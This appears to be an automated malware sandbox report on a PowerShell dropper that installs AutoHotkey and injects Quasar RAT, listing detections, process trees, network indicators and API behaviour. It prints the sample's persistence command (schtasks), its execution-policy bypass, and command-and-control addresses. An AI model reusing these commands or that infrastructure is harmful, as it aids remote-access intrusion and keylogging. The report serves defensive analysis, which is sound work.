Edit tour

Windows Analysis Report
x.ps1

Overview

General Information

Sample name:	x.ps1
Analysis ID:	1577249
MD5:	97646b99bb7245a7be3bbe8a0ff06348
SHA1:	33edac8a75cac4a0a1d084174b3dc912b9744386
SHA256:	3496b253962f9fad33450751e615e676ad8f847d11c50df45a35647b2534755d
Tags:	66-225-254-246ps1user-JAMESWT_MHT
Infos:

Detection

Quasar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Quasar RAT

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Quasar RAT

AI detected suspicious sample

Allocates memory in foreign processes

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Installs a global keyboard hook

Powershell drops PE file

Sample or dropped binary is a compiled AutoHotkey binary

Sigma detected: Execution from Suspicious Folder

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AutoHotkey64.exe (PID: 7500 cmdline: "C:\Users\Public\Documents\AutoHotkey64.exe" MD5: 2D0600FE2B1B3BDC45D833CA32A37FDB)

AddInProcess32.exe (PID: 7556 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

schtasks.exe (PID: 7520 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

AutoHotkey64.exe (PID: 7540 cmdline: C:\Users\Public\Documents\AutoHotkey64.exe MD5: 2D0600FE2B1B3BDC45D833CA32A37FDB)

AddInProcess32.exe (PID: 7760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7804 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AutoHotkey64.exe (PID: 3488 cmdline: C:\Users\Public\Documents\AutoHotkey64.exe MD5: 2D0600FE2B1B3BDC45D833CA32A37FDB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000C.00000002.1927919605.000000000273B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000007.00000002.1854587486.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000D.00000002.1930008150.000000000270B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000B.00000002.1930172049.000000000276B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000002.1927403521.000000000231B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000009.00000002.1855061423.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: powershell.exe PID: 7316	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x55cf0:$b1: ::WriteAllBytes( 0x3a25d2:$b1: ::WriteAllBytes( 0x5196b8:$b1: ::WriteAllBytes( 0x519738:$b1: ::WriteAllBytes( 0x55d42:$b2: ::FromBase64String( 0x55de9:$b2: ::FromBase64String( 0x3a2624:$b2: ::FromBase64String( 0x3a26ce:$b2: ::FromBase64String( 0x51970a:$b2: ::FromBase64String( 0x51978a:$b2: ::FromBase64String( 0x519833:$b2: ::FromBase64String( 0x55dc8:$b3: ::UTF8.GetString( 0x3a26ad:$b3: ::UTF8.GetString( 0x519812:$b3: ::UTF8.GetString( 0xb71cf:$s1: -join 0xc42a4:$s1: -join 0xc7676:$s1: -join 0xc7d28:$s1: -join 0xc9819:$s1: -join 0xcba1f:$s1: -join 0xcc246:$s1: -join
Process Memory Space: AddInProcess32.exe PID: 7564	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7576	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7624	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7760	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7768	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7788	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7804	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.AddInProcess32.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xfc12:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.2.AddInProcess32.exe.400000.0.unpack	MALWARE_Win_QuasarRAT	QuasarRAT payload	ditekSHen	0x103c5:$ua1: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 0x1131c:$us2: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\AutoHotkey64.exe" , CommandLine: "C:\Users\Public\Documents\AutoHotkey64.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\AutoHotkey64.exe, NewProcessName: C:\Users\Public\Documents\AutoHotkey64.exe, OriginalFileName: C:\Users\Public\Documents\AutoHotkey64.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Documents\AutoHotkey64.exe" , ProcessId: 7500, ProcessName: AutoHotkey64.exe

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f, ProcessId: 7520, ProcessName: schtasks.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7316, TargetFilename: C:\Users\Public\Documents\AutoHotkey64.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", ProcessId: 7316, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7316, TargetFilename: C:\Users\Public\Documents\AutoHotkey64.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f, ProcessId: 7520, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1", ProcessId: 7316, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Common RAT Connectivity Check Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T10:20:20.337990+0100	2036383	1	A Network Trojan was detected	192.168.2.4	49730	208.95.112.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected Quasar RAT

Source: Yara match	File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1927919605.000000000273B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1854587486.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1930008150.000000000270B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1930172049.000000000276B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1927403521.000000000231B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1855061423.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7804, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source:

Binary string: D:\Projects\=Work[13]=\File\Quasar\KeyLogger\obj\Release\KeyLogger.pdb source: AddInProcess32.exe, 00000006.00000002.4213601750.0000000002921000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.4236024518.0000000005E30000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BA370 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	19_2_00000001400BA370
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BA270 GetFileAttributesW,FindFirstFileW,FindClose,	19_2_00000001400BA270
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400742C0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,_swprintf,FindNextFileW,FindClose,	19_2_00000001400742C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014004A390 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,	19_2_000000014004A390
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008E5C0 GetFileAttributesW,FindFirstFileW,FindClose,	19_2_000000014008E5C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140074620 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,_swprintf,free,	19_2_0000000140074620
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140074C70 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	19_2_0000000140074C70
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014008DFD0 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,	19_2_000000014008DFD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2036383 - Severity 1 - ET MALWARE Common RAT Connectivity Check Observed : 192.168.2.4:49730 -> 208.95.112.1:80

Yara detected Generic Downloader

Source: Yara match

File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 66.225.254.246:1177

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014008AE00 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,

19_2_000000014008AE00

Source: global traffic

HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: feature-ssa.mywire.org

Source: AddInProcess32.exe, 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: AddInProcess32.exe, 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://freegeoip.net/xml/
Source: AddInProcess32.exe, 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1782858040.0000012DBFE88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: AddInProcess32.exe, 00000006.00000002.4213601750.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: AddInProcess32.exe, 00000006.00000002.4213601750.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/xClient.Core.Data
Source: powershell.exe, 00000000.00000002.1782858040.0000012DBFC61000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1782858040.0000012DBFE88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1782858040.0000012DBFC61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: AutoHotkey64.exe, AutoHotkey64.exe, 00000013.00000000.3468684177.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe.0.dr	String found in binary or memory: https://autohotkey.com
Source: powershell.exe, 00000000.00000002.1812122999.0000012DD089D000.00000004.00000800.00020000.00000000.sdmp, AutoHotkey64.exe, 00000002.00000000.1778420471.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000004.00000000.1796075931.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000013.00000000.3468684177.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe.0.dr	String found in binary or memory: https://autohotkey.comCould
Source: powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1782858040.0000012DBFE88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1782858040.0000012DC01E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Jump to behavior

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140007240 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,

19_2_0000000140007240

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140006EA0 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,		19_2_0000000140006EA0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BD430 EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,		19_2_00000001400BD430

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140007120 GetClipboardFormatNameW,GetClipboardData,

19_2_0000000140007120

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140062000 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,free,free,free,free,

19_2_0000000140062000

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_00000001400222E0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,

19_2_00000001400222E0

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140001BAC GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

19_2_0000000140001BAC

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1927919605.000000000273B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1854587486.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1930008150.000000000270B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
